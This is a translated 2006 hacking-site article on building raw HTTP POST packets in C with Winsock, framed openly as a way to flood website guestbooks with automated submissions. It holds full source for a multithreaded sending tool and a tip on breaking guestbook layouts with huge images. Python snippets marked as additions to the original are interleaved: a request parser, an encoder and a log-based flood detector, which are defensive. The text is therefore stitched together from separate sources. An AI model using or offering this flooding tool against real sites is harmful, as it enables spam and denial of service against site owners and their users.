Using Winsock to implement data injection into a website's database - vulnerability warning - the Black Bar Safety Net

2006-01-31T00:00:00
ID MYHACK58:6220066791
Type myhack58
Reporter 佚名
Modified 2006-01-31T00:00:00

Description

Before writing this article, I need to describe the word "inject". Unlike the usual SQL injection, the "injection" here really just means constructing an HTTP request packet and submitting it from a program instead of from a web page, so that the data is submitted automatically. Hey, speaking of which, I can already see your sly smile: we just write a loop, in whatever language you like, that sends HTTP packets to a particular web page, and within a few minutes, oh, the guestbook bursts... Hey, hey, hey... Let me have a cup of tea and then carry on.

First, let's brush up on the HTTP protocol. When we open a site, say http://www.163.com, IE as the client actually sends the server the following request packet (captured with a sniffer):


GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.163.com
Connection: Keep-Alive
Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=11&22; Province=0; City=0; NTES_UV_COOKIE=YES


We can see that the message above has many fields, and of course many of them are not required; if we do the programming ourselves, we only need to care about the required ones. HTTP/1.1 stipulates that a minimal request message consists of the method field (GET/POST/HEAD) and the Host field, as in the request above: GET / HTTP/1.1 followed by Host: www.163.com.

In HTTP/1.0, however, the Host field is not required. Why it cannot be left out in 1.1 I believe you already know (one IP address can serve several virtual hosts, and Host tells the server which one the request is for); if not, it doesn't matter, read on.

To send data to the server, the browser usually submits the message with the GET or POST method. The server receives the packet, decodes it, extracts the data it needs, processes it, and finally returns the result. For a URL request we commonly see, such as http://xxx.xxx.xxx.xxx/show.asp?id=xxx, we can construct the following packet to do the same thing:

GET /show.asp?id=xxx HTTP/1.1
Host: xxx.xxx.xxx.xxx

Because the URL length is limited to 1024, the GET method can only submit a small amount of data; if we were submitting an article, we could only use the POST method. Before explaining some points about the POST method, let everyone look at a captured POST request packet first, to get a rough idea of what POST packets look like. Below is my comment to a guestbook, again captured with a sniffer.

POST /gbook/add.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer: http://218.76.65.47/gbook/add.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 218.76.65.47
Content-Length: 115
Connection: Keep-Alive

name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&password=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4


Compared with the GET method, there is an extra piece of content below the header fields; this is the data we submit to the guestbook, and any Chinese in it must go through URL encoding. Let us also omit the unnecessary fields and construct a minimal POST request:

POST /gbook/add.php HTTP/1.1
Host: 218.76.65.47
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&password=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4


The Content-Type field above indicates the POST form type, and Content-Length is of course the length of the entity data; it must not be missing or wrong, otherwise the data cannot be received correctly. In this way the server-side page receives the data you submitted and processes it; if it is a guestbook, the data is written to the database. If you send such packets to a guestbook at high speed, the guestbook is simply flooded by you.
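As an added example (not code from the original article), here is a small parser for the kind of request shown above that enforces the two rules the text calls out: an HTTP/1.1 request must carry Host, and Content-Length must match the entity data or the form cannot be read correctly. The request bytes are the article's minimal POST re-typed with CRLF line endings (the 115-byte body is the captured one); the function and exception names are this example's own.

```python
from typing import Dict, Tuple


class RequestError(Exception):
    """Raised when a request breaks one of the rules this parser enforces."""


def _split_head_body(raw: bytes) -> Tuple[bytes, bytes]:
    # The header block ends at the first blank line; accept CRLF or bare LF,
    # since the sender later in the article writes bare LF.
    for marker in (b"\r\n\r\n", b"\n\n"):
        idx = raw.find(marker)
        if idx != -1:
            return raw[:idx], raw[idx + len(marker):]
    raise RequestError("no blank line terminating the headers")


def parse_request(raw: bytes) -> dict:
    """Parse one HTTP request and return request line, headers, body and form fields."""
    head, body = _split_head_body(raw)
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    parts = lines[0].decode("ascii").split(" ")
    if len(parts) != 3:
        raise RequestError("malformed request line")
    method, target, version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, val = line.decode("latin-1").partition(":")
        if not colon:
            raise RequestError("malformed header line: %r" % line)
        headers[name.strip().lower()] = val.strip()  # header names are case-insensitive
    # Rule from the text: an HTTP/1.1 request must carry Host.
    if version == "HTTP/1.1" and "host" not in headers:
        raise RequestError("HTTP/1.1 request without Host header")
    # Rule from the text: Content-Length must match the entity data. A short body
    # means the request is incomplete; bytes beyond the declared length belong to
    # the next request on a keep-alive connection.
    declared = int(headers.get("content-length", "0"))
    if len(body) < declared:
        raise RequestError("body truncated: Content-Length %d but only %d bytes received"
                           % (declared, len(body)))
    body = body[:declared]
    form: Dict[str, str] = {}
    if headers.get("content-type") == "application/x-www-form-urlencoded":
        for pair in body.decode("ascii").split("&"):
            key, _, val = pair.partition("=")
            form[key] = val  # values stay percent-encoded; decoding is a separate step
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body, "form": form}


# The article's minimal POST, re-typed here as a constructed byte string.
BODY = (b"name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif"
        b"&comment=test&password=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4")
MINIMAL_POST = (b"POST /gbook/add.php HTTP/1.1\r\n"
                b"Host: 218.76.65.47\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n"
                b"Content-Length: 115\r\n"
                b"\r\n") + BODY


def check_missing_host() -> str:
    """What the parser says about an HTTP/1.1 request that omits Host."""
    try:
        parse_request(b"POST /gbook/add.php HTTP/1.1\r\nContent-Length: 0\r\n\r\n")
    except RequestError as err:
        return str(err)
    return "accepted"


def check_truncated_body() -> str:
    """What the parser says when the body is shorter than Content-Length."""
    try:
        parse_request(MINIMAL_POST[:-10])
    except RequestError as err:
        return str(err)
    return "accepted"


if __name__ == "__main__":
    print(parse_request(MINIMAL_POST)["form"])
    print(check_missing_host())
    print(check_truncated_body())
```

A server that does not enforce the length check is the one that "cannot receive correctly": it either blocks waiting for bytes that never arrive or reads the next request's bytes as part of this body.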

Oh, I don't even know what I'm talking about any more, it's all a muddle; I really do want to explain things clearly, but my language skills never passed the test, so I hope my brothers and sisters will forgive me. That covers what the client sends; now for the question of how the server receives it.

When the packet arrives at the server, the server's underlying process receives it, places it in a particular buffer, and sets some environment variables such as "CONTENT_LENGTH" and "QUERY_STRING". Of course some low-level details are hidden during this, such as how the data submitted by the client is redirected to the standard input of the requested page; I haven't figured that out either. Hey hey, if I could figure that out I'd be off writing an OS. After that, high-level application programs such as CGI, ASP and PHP extract the data, where CGI must do its own URL decoding and string extraction. If I write a message to an ASP guestbook, submitting a name field and a body field with a POST form, the ASP program should receive them as follows:

name=request.form("name")
body=request.form("body")

And add them to the database:

rs.addnew
rs("name")=name
rs("body")=body
rs.update

By now it has basically all been said, but there is one more thing to note: when sending the message, the entity content must also include the Submit button's "name=value", URL-encoded, otherwise it may not be written to the database. Why? I'm still looking for the reason! The following is the relevant source code:

/* encode.h */
/* URL encode / unencode (decode) functions */
/*
It should be noted here that when the compiler processes Chinese characters it automatically reads one
or two characters depending on bit 7 of the character, so we force the use of unsigned char * to read one byte at a time.
*/
#include <stdio.h>
#include <ctype.h>

/* Returns 1 if ch has to be percent-encoded: space, '%', '/', or any byte with the high bit set (e.g. a GBK Chinese byte). */
int isT(char ch)
{
    if(ch==' '||ch=='%'||ch=='/'||ch&0x80) return 1;
    else return 0;
}

/* URL-encode s into d. d must have room for up to 3 bytes per input byte plus the terminator; no bound is checked. */
int encode(char *s,char *d)
{
    if(!s||!d) return 0;
    for(;*s!=0;s++)
    {
        unsigned char *p=(unsigned char *)s;
        if(*p==' ')
        {
            *d='%';
            *(d+1)='2';
            *(d+2)='0';
            d+=3;
        }
        else if(isT(*p))
        {
            char a[3];
            *d='%';
            sprintf(a,"%02x",*p);   /* lowercase hex, two digits */
            *(d+1)=a[0];
            *(d+2)=a[1];
            d+=3;
        }
        else
        {
            *d=*p;
            d++;
        }
    }
    *d=0;
    return 1;
}

/* Unencode: the URL decoding function. '+' becomes a space, %XX becomes the byte XX. */
int unencode(char *s,char *d)
{
    if(!s||!d) return 0;
    for(;*s!=0;s++)
    {
        if(*s=='+')
        {
            *d=' ';
            d++;
        }
        /* Only treat '%' as an escape when two hex digits follow; without this check a
           trailing "%" or "%4" makes s+=2 step past the end of the string. */
        else if(*s=='%'&&isxdigit((unsigned char)s[1])&&isxdigit((unsigned char)s[2]))
        {
            int code;
            if(sscanf(s+1,"%02x",&code)!=1) code='?';
            *d=(char)code;
            s+=2;
            d++;
        }
        else
        {
            *d=*s;
            d++;
        }
    }
    *d=0;
    return 1;
}
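The same encoding and decoding rules as encode.h, written as an added example in Python over bytes (this is not the article's code): multi-byte GBK characters are handled one byte at a time, which is the point the header comment makes about bit 7. The decoder keeps a "%" that is not followed by two hex digits, the case where the C version advances past the end of the string. One caveat worth seeing in the last check: isT() does not escape "&", "=" or "+", so a user value containing them is split or mis-read by the server's form parser. The GBK byte string is constructed here from the doadd value captured above; the function names are this example's own.

```python
# Constructed: the GBK bytes of the doadd (Submit button) value captured in the article.
SUBMIT_LABEL_GBK = b"\xb7\xa2\xcb\xcd\xc1\xf4\xd1\xd4"

HEX = b"0123456789abcdefABCDEF"


def needs_escape(b: int) -> bool:
    """Mirror of isT(): space, '%', '/', or any byte with the high bit set."""
    return b in (0x20, 0x25, 0x2F) or b >= 0x80


def url_encode(data: bytes) -> bytes:
    """Percent-encode bytes the way encode() in encode.h does (lowercase hex)."""
    out = bytearray()
    for b in data:
        if needs_escape(b):
            out += b"%%%02x" % b  # "%02x" in the C code gives lowercase hex
        else:
            out.append(b)
    return bytes(out)


def url_decode(data: bytes) -> bytes:
    """Decode like unencode(): '+' -> space, %XX -> the byte XX.

    A '%' not followed by two hex digits is copied through unchanged instead of
    being consumed, so a truncated escape at the end of the input is harmless.
    """
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b == 0x2B:  # '+'
            out.append(0x20)
            i += 1
        elif b == 0x25 and i + 2 < len(data) and data[i + 1] in HEX and data[i + 2] in HEX:
            out.append(int(data[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(b)
            i += 1
    return bytes(out)


def build_form_body(fields) -> bytes:
    """Join (name, value) byte pairs into a form body using these encoding rules."""
    return b"&".join(url_encode(k) + b"=" + url_encode(v) for k, v in fields)


if __name__ == "__main__":
    body = build_form_body([(b"name", b"test"), (b"comment", b"hello world"),
                            (b"doadd", SUBMIT_LABEL_GBK)])
    print(body)
    print(url_decode(body).decode("gbk", "replace"))
```

Because the encoder leaves "&" and "=" alone, any real form library escapes them too; the page's rule is enough only when the values are known not to contain them.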

/* booksend.cpp */
/* Packet send procedure */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "encode.h"
#pragma comment(lib,"ws2_32.lib")

int checkpra(int argc,char *argv[]);
void usage();
DWORD WINAPI senddata(LPVOID lp);

char ip[20]={0};
USHORT port=0;
char page[128]={0};
char value[1024]={0};
int ttime=1;           /* how many times to send */
int delaytime=2000;    /* milliseconds between sends */
SOCKET sock;
struct sockaddr_in sin;
char sendbuf[1024*4]={0};

void main(int argc,char *argv[])
{
    if(checkpra(argc,argv)==-1) return;
    WSADATA wsa;
    if(WSAStartup(0x0202,&wsa)!=0)
    {
        printf("WSAStartup failed with error:%d\n",GetLastError());
        return;
    }
    sin.sin_family=AF_INET;
    if(inet_addr(ip)!=INADDR_NONE)
        sin.sin_addr.S_un.S_addr=inet_addr(ip);
    else
    {
        struct hostent *phost=gethostbyname(ip);
        if(phost==NULL)
        {
            printf("Resolve %s error!\n",ip);
            return;
        }
        memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
    }
    sin.sin_port=htons(port);
    /* build the minimal POST request described above */
    char tempbuf[1024]={0};
    sprintf(tempbuf,"POST %s HTTP/1.1\n",page);
    strcpy(sendbuf,tempbuf);
    memset(tempbuf,0,sizeof(tempbuf));
    sprintf(tempbuf,"HOST: %s\n",ip);
    strcat(sendbuf,tempbuf);
    strcat(sendbuf,"Accept: image/gif, */*\n");
    strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");
    memset(tempbuf,0,sizeof(tempbuf));
    sprintf(tempbuf,"Content-Length: %d\n",strlen(value));
    strcat(sendbuf,tempbuf);
    strcat(sendbuf,"Connection: Keep-Alive\n\n");
    strcat(sendbuf,value);
    for(int i=0;i<ttime;i++)
    {
        CreateThread(NULL,0,senddata,&i,0,NULL);
        Sleep(delaytime);
    }
    WSACleanup();
}

DWORD WINAPI senddata(LPVOID lp)
{
    SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
    if(sock==INVALID_SOCKET)
    {
        printf("Socket() failed with error:%d\n",GetLastError());
        return -1;
    }
    int ret;
    printf("State:Connecting...\n");
    ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
    if(ret==SOCKET_ERROR)
    {
        printf("Connect() failed with error:%d\n",GetLastError());
        return -1;
    }
    printf("State:Connected!\n");
    printf("State:Sending...time %d ",*(int *)lp+1);   /* lp points at the loop counter */
    ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
    if(ret>0)
        printf("Send success!\n");
    else
        printf("Send error!\n");
    char recvbuf[1024*10]={0};
    ret=recv(sock,recvbuf,sizeof(recvbuf),0);
    /* a 100, 200 or 302 status in the reply counts as accepted */
    if(strstr(recvbuf,"100")||strstr(recvbuf,"200")||strstr(recvbuf,"302"))
        printf("Oh, the injection succeeded!\n\n");
    else
        printf("The injection had a bit of a problem, please check!\n\n");
    closesocket(sock);
    return 1;
}

void usage()
{
    char pathname[128]={0};
    GetModuleFileName(NULL,pathname,sizeof(pathname));
    char *p=pathname+strlen(pathname)-1;
    for(;*p!='\\';p--);   /* strip the directory, keep only the exe name */
    printf("-----------------------------------------------\n");
    printf("Usage:%s ip port page value [times] [delay]\n",p+1);
    printf("Code by JsuFcz--http://jsufcz.21xcn.net\n");
    printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=sending message\n",p+1);
    printf("-----------------------------------------------\n");
}

int checkpra(int argc,char *argv[])
{
    if(argc<5)
    {
        printf("incorrect usage: should be at least 4 arguments\n\n");
        usage();
        return -1;
    }
    else if(argc>7)   /* program name plus at most 6 parameters */
    {
        printf("wrong usage: only up to 6 parameters\n\n");
        usage();
        return -1;
    }
    if(argc==6)
    {
        ttime=atoi(argv[5]);
    }
    if(argc==7)
    {
        ttime=atoi(argv[5]);
        delaytime=atoi(argv[6]);
    }
    strcpy(ip,argv[1]);
    port=atoi(argv[2]);
    strcpy(page,argv[3]);
    /* '-' separates fields on the command line and becomes '&'; '"' becomes a space */
    for(int i=0;argv[4][i]!=0;i++)
    {
        if(argv[4][i]=='-') argv[4][i]='&';
        if(argv[4][i]=='\"') argv[4][i]=' ';
    }
    encode(argv[4],value);
    return 0;
}


The code above compiles under VC6; you can also download the source code and the command-line program from my personal home page at http://jsufcz.21xcn.net.
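The defender's view of the loop above, as an added example that is not part of the article: it scans constructed access-log lines in combined format and flags any client that POSTs to the same form more than a threshold number of times within a short window, and separately lists clients whose requests carry no User-Agent, since the sender above writes none. The log lines, addresses and function names are this example's own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Combined-format access log line (client, timestamp, request line, status, size, referer, user agent).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def parse_line(line: str) -> Optional[dict]:
    """Return the fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_post_floods(lines: List[str], threshold: int = 5,
                     window_seconds: int = 60) -> Dict[Tuple[str, str], int]:
    """Return {(client_ip, path): peak_count} for clients that POST to the same
    path more than `threshold` times within any `window_seconds` span.
    Lines are assumed to be in time order, as a log file is."""
    recent: Dict[Tuple[str, str], deque] = defaultdict(deque)
    flagged: Dict[Tuple[str, str], int] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        key = (rec["ip"], rec["path"])
        window = recent[key]
        window.append(rec["ts"])
        while (window[-1] - window[0]).total_seconds() > window_seconds:
            window.popleft()  # drop timestamps that fell out of the window
        if len(window) > threshold:
            flagged[key] = max(flagged.get(key, 0), len(window))
    return flagged


def clients_without_user_agent(lines: List[str]) -> List[str]:
    """Clients whose requests carry no User-Agent header."""
    ips = set()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["ua"] in ("", "-"):
            ips.add(rec["ip"])
    return sorted(ips)


def constructed_log() -> List[str]:
    """Constructed sample: one browser visitor, then eight POSTs two seconds apart
    from a second address (the sender's default delay is 2000 ms)."""
    ua = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    lines = [
        '192.0.2.10 - - [31/Jan/2006:22:15:01 +0800] "GET /gbook/add.php HTTP/1.1" 200 2311 "-" "%s"' % ua,
        '192.0.2.10 - - [31/Jan/2006:22:15:40 +0800] "POST /gbook/add.php HTTP/1.1" 302 0 '
        '"http://192.0.2.1/gbook/add.php" "%s"' % ua,
    ]
    for i in range(8):
        lines.append('192.0.2.77 - - [31/Jan/2006:22:16:%02d +0800] '
                     '"POST /gbook/add.php HTTP/1.1" 302 0 "-" "-"' % (2 * i))
    return lines


if __name__ == "__main__":
    log = constructed_log()
    print(find_post_floods(log))
    print(clients_without_user_agent(log))
```

The rate check is the one that matters; the missing User-Agent is only a weak corroborating signal, since any sender can add the header.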

At the end of the article, I have a little experience to share. If the guestbook lets you submit emoticons or pictures, then because the guestbook only restricts relative links, any image resource under the guestbook's directory is fetched by its path, so if an image is very large, the guestbook's layout is broken by you.

(Declaration: this article is only for sharing with friends interested in technology; if anyone uses it for unlawful purposes, I take no responsibility.)